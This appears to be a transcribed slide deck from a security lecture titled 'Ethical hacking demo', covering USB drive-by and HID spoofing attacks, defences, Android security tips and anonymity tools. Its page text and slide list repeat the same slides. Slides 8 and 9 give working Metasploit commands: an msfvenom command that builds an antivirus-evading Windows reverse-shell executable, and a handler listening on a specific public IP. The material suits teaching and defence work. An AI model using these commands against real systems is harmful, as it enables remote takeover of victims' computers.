際際滷

際際滷Share a Scribd company logo

Ethical hacking demo

Download as PPTX, PDF
Tendai Marengereke
Tendai Marengereke

This document discusses USB drive-by attacks and staying anonymous online. It describes different types of USB attacks like social engineering and human interface device spoofing. It provides tips for defending against USB attacks through awareness, restricting ports, and restricting authorized USB devices. The document also demonstrates creating a reverse shell payload for Windows and maintaining Android security. It discusses ways to stay anonymous online like using VPNs, proxies, and Tor.

1 of 13
Download to read offline
USB DRIVE-BY & ANONYMOUS INTERNET TENDAI M MARENGEREKE, Information Security Expert M.Tech Cyber Forensics India University Lecturer Harare Institute Of Technology Researcher Digital Forensics, Machine Learning, Big Data, Information Security, Cloud Computing
CONTENT What is USB Drive-by Different USB attacks Anonymous Internet
TYPE OF ATTACKS CARRIED ON USB DEVICES
SOCIAL ENGINEERING
HUMAN INTERFACE DEVICE
CHALLENGES TO MAKE DROPPABLE HID SPOOFING DEVICES Cross-device via OS fingerprinting Keyboards and other HID devices were never meant to be OS aware Small binary-less persistent reverse-shell Create small payload that spawns a reverse-shell without triggering AV Camouflaging HID device as a credible USB drive
DEFENDING AGAINST USB ATTACKS Awareness and security training Teaching people to be mindful of what they plug into their computer Block USB ports Physically block the USB ports on sensitive computers Restrict the type of USB authorized
CREATING OUR MALWARE(REVERSE SHELL PAYLOAD) FOR WINDOWS msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=IP ADDRESS LPORT=443 -e x86/shikata_ga_nai -f exe -o file.exe
CREATING OUR MALWARE(REVERSE HTTPS PAYLOAD) FOR WINDOWS msfconsole q use exploit/multi/handler set payload windows/meterpreter/reverse_https set lport 443 Set lhost 128.199.249.53 exploit
TIPS ON MAINTAINING ANDROID SECURITY Keep your phones OS updated Check permissions before installing any apps Avoid installing apps from untrusted sources and third party app stores Avoid using stock android browser Beware of SMS threats Do not connect to unsecured WiFi networks Upgrade your android device to at least 3.0
ANONYMOUS INTERNET
WAYS OF STAYING ANONYMOUS ONLINE VPNs Proxies TOR
TOR DEMO

More Related Content

Ethical hacking demo

  • 1. USB DRIVE-BY & ANONYMOUS INTERNET TENDAI M MARENGEREKE, Information Security Expert M.Tech Cyber Forensics India University Lecturer Harare Institute Of Technology Researcher Digital Forensics, Machine Learning, Big Data, Information Security, Cloud Computing
  • 2. CONTENT What is USB Drive-by Different USB attacks Anonymous Internet
  • 3. TYPE OF ATTACKS CARRIED ON USB DEVICES
  • 6. CHALLENGES TO MAKE DROPPABLE HID SPOOFING DEVICES Cross-device via OS fingerprinting Keyboards and other HID devices were never meant to be OS aware Small binary-less persistent reverse-shell Create small payload that spawns a reverse-shell without triggering AV Camouflaging HID device as a credible USB drive
  • 7. DEFENDING AGAINST USB ATTACKS Awareness and security training Teaching people to be mindful of what they plug into their computer Block USB ports Physically block the USB ports on sensitive computers Restrict the type of USB authorized
  • 8. CREATING OUR MALWARE(REVERSE SHELL PAYLOAD) FOR WINDOWS msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=IP ADDRESS LPORT=443 -e x86/shikata_ga_nai -f exe -o file.exe
  • 9. CREATING OUR MALWARE(REVERSE HTTPS PAYLOAD) FOR WINDOWS msfconsole q use exploit/multi/handler set payload windows/meterpreter/reverse_https set lport 443 Set lhost 128.199.249.53 exploit
  • 10. TIPS ON MAINTAINING ANDROID SECURITY Keep your phones OS updated Check permissions before installing any apps Avoid installing apps from untrusted sources and third party app stores Avoid using stock android browser Beware of SMS threats Do not connect to unsecured WiFi networks Upgrade your android device to at least 3.0
  • 12. WAYS OF STAYING ANONYMOUS ONLINE VPNs Proxies TOR